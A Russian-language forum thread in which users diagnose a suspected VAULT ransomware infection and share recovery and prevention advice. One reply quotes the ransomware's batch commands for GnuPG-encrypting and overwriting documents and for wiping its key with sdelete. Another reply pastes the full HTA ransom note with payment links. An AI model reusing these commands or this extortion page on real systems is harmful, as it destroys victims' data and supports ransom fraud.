Показано с 1 по 4 из 4

Тема: шифровальщик vault

  1. #1
    Любопытный Аватар для Trunk
    Регистрация
    11.05.2018
    Сообщений
    50
    Статистика
    Баллы
    113
    Level
    3
    Активность
    Проблем
    0
    Проблем решено
    0
    Лучших ответов
    0
    Хороших ответов
    0
    Вес репутации
    1

    шифровальщик vault

    Привет! Помогите с диагностикой ПК, есть комп с windows 7 и в нем появились подозрительные файлы vault.key и confirmation.key. Есть подозрения на инфицирование шифровальщиком vault. В системе установлен kaspersky endpoint security 10. Запустил полную проверку но пока ничего не найдено..

  2. #2
    Любопытный Аватар для Razer
    Регистрация
    11.05.2018
    Сообщений
    61
    Статистика
    Баллы
    139
    Level
    4
    Активность
    Проблем
    0
    Проблем решено
    0
    Лучших ответов
    0
    Хороших ответов
    0
    Вес репутации
    1
    1. Максимально изолируйте PC от остальной сети, выдерните провод LAN
    2. Скачайте CureIT или DrWeb Live DVD
    https://free.drweb.ru/aid_admin/

    Можно прогнать касперским Kaspersky Rescue DVD
    Загрузитесь с этих Live DVD проверьте систему.

    Посмотрите вот эти утилиты для борьбы с вирусами http://support.kaspersky.ru/viruses/utility
    Возможно что то удастся расшифровать

  3. #3
    Почетный гость Аватар для Xeno
    Регистрация
    11.05.2018
    Сообщений
    45
    Статистика
    Баллы
    94
    Level
    3
    Активность
    Проблем
    0
    Проблем решено
    0
    Лучших ответов
    0
    Хороших ответов
    0
    Вес репутации
    0
    Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

    1. проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки.
    Используйте для работы с теневыми копиями ShadowExplorer

    если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование
    пространства в 5-10% под теневые копии.

    2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
    для этого необходимо найти файл secring.gpg.
    secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP%
    юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает
    данный ключ с помощью утилиты sdelete.exe.
    Код:
    "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
    "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt"
    "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"
    Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов
    не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.
    что делает шифратор с исходными файлами:
    Код:
    dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
    echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
    echo %%i>> "%temp%\conf.list"
    )
    после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc,
    и только затем переименовывается в 1.doc.vault.
    т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
    Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg,
    но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно.
    В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли
    с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
    --------
    если sec key найден, вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

    скачайте отсюда и установите GnuPG
    +
    отсюда можно скачать GPGShell

    В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
    +
    После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
    -----------

    В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
    +
    После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
    -----------

    как можно избежать встречи с VAULT?
    1. будьте предельно внимательны при работе с почтой.
    если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом.
    Значит вас вводят в заблуждение, выдавая черное за белое.
    2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
    например:
    Код:
    %userprofile%\Local Settings\Temp\_tc\*.js
    %userprofile%\Appdata\Local\Temp\_tc\*.js
    3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
    в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую
    пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

    4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае
    шифрование состоится, но известным ключом. Или не состоится. отсюда

  4. #4
    Любопытный Аватар для Trunk
    Регистрация
    11.05.2018
    Сообщений
    50
    Статистика
    Баллы
    113
    Level
    3
    Активность
    Проблем
    0
    Проблем решено
    0
    Лучших ответов
    0
    Хороших ответов
    0
    Вес репутации
    1
    Спасибо! Но тут вопрос в другом, вроде бы симптомы есть (*.key файлы) но еще ничего не зашифровано, как удалить этот вредонос???

    - -Подумал и добавил - -

    Фуххх. Пронесло, короче разобрались что произошло. Никакой заразы не было. А те файлики которые были - липа. Вредонос пытался попасть в нашу сетку через email рассылки (благо у нас пара - тройка cisco iron port c100v с sophos антивирусным движком). Вот как раз они то и уберегли от шифровальщика - вредоносный код был вырезан из тела письма. А ошметки от вируса пропустил. В итоге у пользователя был
    только hta файлик с картинкой от вымогателей и все.
    Исходный код ниже
    Код:
    <html><head><hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/><style>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center}.vstyle{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:30px;width:900px;color:#3CEE3C;padding:20px;background-color:#7a7a7a;}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 40px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:0.6em}</style><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Block Notification</title><script language="vbscript">
    sub Window_Onload
    window.resizeTo 1280,725
    screenWidth = Document.ParentWindow.Screen.AvailWidth
    screenHeight = Document.ParentWindow.Screen.AvailHeight
    posLeft = (screenWidth - 1280) / 2
    posTop = (screenHeight - 725) / 2
    window.moveTo posLeft, posTop
    end sub
    </script></head><body scroll="no"><div class="vstyle"><div class="sc"><font color="#FF6666">ВНИМАНИЕ!<br>Ваш компьютер был заблокирован<br>Все Ваши документы и медиафайлы были <b>зашифрованы</b></font></div><div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;">Для их восстановления необходимо <b>купить</b> Ваш уникальный дешифратор</div><br><div class="briefly"><div class="bti"><b>Кратко:</b></div><div class="sced">Необходимо произвести 5 шагов:<hr>1. Найдите VАULТ.KЕY<br>2. Перейдите в Ваш кабинет<br>3. Получите <b>ГАРАНТИИ</b><br>4. Приобретите ключ<br>5. Восстановите файлы</div></div><div class="detailed"><div class="bti"><b>Детально:</b></div><div class="sced">Перейдите в клиент-панель по <b>ссылке</b>:<div class="bti" style="margin:5px 8%;padding:0px;cursor:text;"><a href="http://torscreen.org" style="color:#555;text-decoration:none">http://torscreen.org</a></div><center><b style="font-weight:400;font-size:0.6em">Авторизируйтесь > Получите гарантии > Оплатите > Восстановитесь</b></center><hr style="margin:10px 0 10px 0"><form action="http://bit.ly/29dKy1h?vlt"><input class="dbutt" type="submit" value="Что произошло?" style="font-weight:600;height:2em"></form>&nbsp;&nbsp;<form action="http://bit.ly/29dKui4?vlt"><input class="dbutt" type="submit" value="Дополнительные ссылки" style="font-weight:400;height:2em"></form></div>
    <div class="footer">Инфо 1: Никто, кроме нас не сможет восстановить Ваш компьютер.</div><div class="footer">Инфо 2: Для восстановления необходим <u>только</u> <b>VАULТ.KЕY</b>. Сделайте копию!</div>
    <div class="footer">Инфо 3: Полиция/Антивирусы не восстановят Ваши файлы</div>
    <div class="footer" style="border:2px dashed #8e8e8e;"><u>Есть сложности</u>? Пишите на почту <b>vault.decrypt@gmail.com</b></div></div>
    </body></html>
    image_64.jpg
    Короче мораль - используйте продвинутые антиспам фильтры!
    Все.

Похожие темы

  1. шифровальщик .better_call_saul
    от ROOT в разделе Вирусы и антивирусы
    Ответов: 2
    Последнее сообщение: 15.05.2018, 16:35
  2. вирус .vault
    от Julia в разделе Вирусы и антивирусы
    Ответов: 1
    Последнее сообщение: 15.05.2018, 15:54
  3. Ваш почтовый ящик почти заполнен
    от awocose в разделе Техническая поддержка
    Ответов: 3
    Последнее сообщение: 11.05.2018, 15:49

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •